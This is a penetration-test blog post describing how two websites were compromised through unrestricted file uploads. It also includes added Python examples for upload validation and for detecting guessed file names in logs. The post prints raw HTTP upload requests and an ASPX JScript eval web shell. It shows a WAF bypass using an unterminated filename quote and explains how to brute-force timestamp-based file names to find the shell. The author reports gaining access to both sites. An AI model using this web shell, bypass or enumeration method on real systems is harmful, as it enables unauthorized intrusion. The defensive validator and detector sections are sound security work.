One file upload, two sites!


Site 1: file upload

Site 2: file upload


Site 1: file upload

Source code leaks found

Open the trusty old junk wordlist, scan, and find that information has been leaked; try a code audit.
File location: SimpleDataPlatform.SimpleDataPlatform.fileUpload

Find ProcessRequest, which receives the request. You can see that after obtaining (initializing) a bunch of parameters, it enters the HandleFiles method.

Follow HandleFiles for the processing: if dateType=ZBJHSB, the request continues to be processed. dateType is passed as a GET parameter.

The path is /Uploads/SetData/ZBJHSB, the str (name) is a timestamp, and str2 (the extension) is not restricted.

OK, this should be a straightforward arbitrary file upload. If the path were returned, the site would be done for. Unfortunately, it doesn't return anything.
Because of the fileUpload method, the file name is


Also, brute-forcing with an existing wordlist successfully found a file name that returned 200.

Construct the upload form directly. The name field of the form doesn't need any particular value (it isn't checked in the code). After sending the packet it returns 200. Was it really uploaded?

POST /FileUploads.ashx?DataType=ZBJHSB HTTP/1.1
Content-Length: 195
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySVkAJfiOUeRxhsu8
Accept: */*
Connection: close

Content-Disposition: form-data; name="File"; filename="1.aspx"
Content-Type: image/jpeg



Earlier we saw that the file name uses the yyyyMMddHHmmssfff format and that the extension is taken directly from the upload as ext. Since we also know the exact path, we only need to brute-force the timestamp file name to take the site. We hadn't tried this before, so why not give it a go.

Brute-forcing the timestamp

Use PowerShell to generate a timestamp, then press Go in Burp to send the request:
powershell -c Get-Date -Format yyyyMMddHHmmssfff

Then brute-force the last 5 digits, i.e. ssfff (because the computer's clock may be off, sometimes 6 digits have to be brute-forced).
I don't know how long I waited.


Got lucky. I won't say much about what came after.

Site 2: file upload

Finding the upload interface

Opening the website http://xxxx:880/zwwpt/#/ , a webpack build is found with debug mode left on. Checking the JS reveals the upload interface.

A hidden HTML page is found that is not reachable from any front-end function node.


Click attachment upload and capture the packet.


There is a WAF; when the WAF blocks a request it returns 404. The packet looks roughly like this (some other useless parameters omitted):

POST /jtwpt/Ashxs/BaseInfoTransfer.ashx HTTP/1.1
Cookie: Hm_lvt_a8b89d1c622d63c547c83ec412cc50ef=1631849663; Hm_lvt_69968305fa176c802589452987ebddc8=1631858810
Connection: close

Content-Disposition: form-data; name="uploadfile[]"; filename="1.aspx"
Content-Type: image/jpeg

<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>




Modify the Host header (ports other than 880 should also be fine):

POST /jtwpt/Ashxs/BaseInfoTransfer.ashx HTTP/1.1
Cookie: Hm_lvt_a8b89d1c622d63c547c83ec412cc50ef=1631849663; Hm_lvt_69968305fa176c802589452987ebddc8=1631858810
Connection: close

Content-Disposition: form-data; name="uploadfile[]"; filename="1.aspx
Content-Type: image/jpeg


The WAF is bypassed and the upload succeeds, but no path is returned.
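Both uploads went through because the checks sat in the wrong place: Site 1 took the extension straight from the client and named files by timestamp, and Site 2 relied on a WAF pattern that an unterminated filename quote slips past. The following is an added example, not code from either site, of the check a handler should make itself: it extracts the filename even when the closing quote is missing, allowlists the extension, and stores under an unpredictable name. The ALLOWED_EXTENSIONS policy and the function names are assumptions.

```python
import re
import secrets
from typing import Optional

# Extensions this endpoint may keep. Server-executable types such as .aspx or
# .ashx are never on the list, whatever Content-Type the client claims.
# (Constructed policy for this example.)
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}

def client_filename(content_disposition: str) -> str:
    """Extract the filename parameter from a multipart Content-Disposition header.

    Tolerates a missing closing quote, so filename="1.aspx (no terminator)
    still yields '1.aspx'. The decision is then made on what the application
    would actually save, not on whether a quoted-string regex happened to match.
    """
    m = re.search(r'filename\s*=\s*"?([^";]*)"?', content_disposition, re.IGNORECASE)
    if not m:
        return ""
    # Drop any path components the client sent (../ or ..\ tricks).
    return re.split(r"[\\/]", m.group(1).strip())[-1]

def validate_extension(filename: str) -> Optional[str]:
    """Return the normalized extension if it is allowed, else None."""
    if "." not in filename:
        return None
    ext = filename.rsplit(".", 1)[1].lower()
    return ext if ext in ALLOWED_EXTENSIONS else None

def storage_name(ext: str) -> str:
    """Unpredictable server-side name: 128 bits from the OS CSPRNG plus the
    validated extension. Unlike a yyyyMMddHHmmssfff name, it cannot be found
    by guessing a few digits around the upload time."""
    return f"{secrets.token_hex(16)}.{ext}"

def decide_upload(content_disposition: str) -> Optional[str]:
    """Handler-side check: the name to store under, or None to reject."""
    ext = validate_extension(client_filename(content_disposition))
    return storage_name(ext) if ext else None
```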


Finding the path

However, the /uploads/ and /image/ directories were found earlier.



The HTML page is called security_risk.html, so construct paths like securityrisk, security_risk, security, etc., and run a directory brute-force.
Finally, this directory was found to exist:


Guess that uploaded files probably land in this directory, otherwise there would be no need for such a name, and it also contains "upload"; so try accessing the file name 1.txt directly, which returns 404.


Brute-forcing the timestamp

In my humble experience, websites like to use timestamps for naming, so construct the current timestamp and try to brute-force timestamp values around the time of the upload.
Timestamps are generally 10 or 13 digits.


The rules used to rename files after upload are generally:
1. Random string
Formats like xxx-xxx-xxx--xxx.jpg cannot be guessed. Without directory traversal or a returned path we can basically give up.

2. Timestamp type

Timestamp + .jpg directly as the file name (e.g. 16318676.jpg), or:
timestamp+00001
timestamp+0001
timestamp+001
timestamp+01
timestamp

3. yyyyMMddHHmm type
This type is generally in the format 20210917xxxxx, where xxxx is a millisecond-level number. Burp can brute-force it directly; 4-6 digits are still feasible, more is not.
powershell -c Get-Date -Format yyyyMMddHHmm




With the approach sorted out, start brute-forcing. Just note the current time when Burp sends the packet, get the timestamp for it, and run Burp Intruder. Going through the patterns one by one takes about 15 runs; each time I brute-force the last 5 digits (any of the types should be fine as long as the site does not strip or omit digits).

After a lot of brute-forcing, the uploaded text file was found; its format and content were:
After the path is found, the rest needs no explanation.

However, this method still depends on luck, because the current machine's clock is likely out of sync with the target server's, by a few hours or even days.
If the format is yyyyMMddHHmmssfff, there is basically nothing to be done; I would just consider myself unlucky.
If it is yyyyMMddHHmmss, brute-forcing the 6-digit part is feasible.
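A defender can spot this kind of guessing in the web server logs: one client requesting many all-digit file names under the upload directory, mostly 404, then a 200. The following is an added example, not from the post, that runs such a check over a few constructed IIS-style log lines using the Site 1 upload path; the log layout, threshold and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines (not a real log) in a simplified W3C/IIS layout:
# date time c-ip cs-method cs-uri-stem sc-status
SAMPLE_LOG = """\
2021-09-17 03:12:01 203.0.113.7 GET /Uploads/SetData/ZBJHSB/20210917031153512.aspx 404
2021-09-17 03:12:01 203.0.113.7 GET /Uploads/SetData/ZBJHSB/20210917031153513.aspx 404
2021-09-17 03:12:01 203.0.113.7 GET /Uploads/SetData/ZBJHSB/20210917031153514.aspx 404
2021-09-17 03:12:02 203.0.113.7 GET /Uploads/SetData/ZBJHSB/20210917031153515.aspx 404
2021-09-17 03:12:02 203.0.113.7 GET /Uploads/SetData/ZBJHSB/20210917031153516.aspx 404
2021-09-17 03:12:02 203.0.113.7 GET /Uploads/SetData/ZBJHSB/20210917031153517.aspx 200
2021-09-17 03:12:05 198.51.100.4 GET /Uploads/SetData/ZBJHSB/banner.jpg 200
2021-09-17 03:12:06 198.51.100.4 GET /Uploads/SetData/ZBJHSB/1631867644.jpg 404
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<ip>\S+) \S+ (?P<uri>\S+) (?P<status>\d{3})$"
)
# All-digit base name of 8 to 17 digits (covers epoch seconds/millis and yyyyMMddHHmmssfff).
NUMERIC_NAME_RE = re.compile(r"^/uploads/.*/\d{8,17}\.[a-z0-9]+$", re.IGNORECASE)

def find_enumeration(log_text, window_seconds=60, threshold=5):
    """Return {ip: (misses, hits)} for clients that requested at least `threshold`
    numeric-named files under /Uploads/ within one window. Many 404s followed by
    a 200 from the same client is the signature of a guessed upload name."""
    window = timedelta(seconds=window_seconds)
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not NUMERIC_NAME_RE.match(m["uri"]):
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        events[m["ip"]].append((ts, int(m["status"])))
    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until every event in it fits `window`.
            while evs[end][0] - evs[start][0] > window:
                start += 1
            chunk = evs[start:end + 1]
            if len(chunk) >= threshold:
                flagged[ip] = (sum(s == 404 for _, s in chunk), sum(s == 200 for _, s in chunk))
    return flagged
```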

At this point, access has been obtained on both sites.







Tags: PHP Python security penetration test Web Security

Posted on Mon, 25 Oct 2021 22:50:08 -0400 by tnan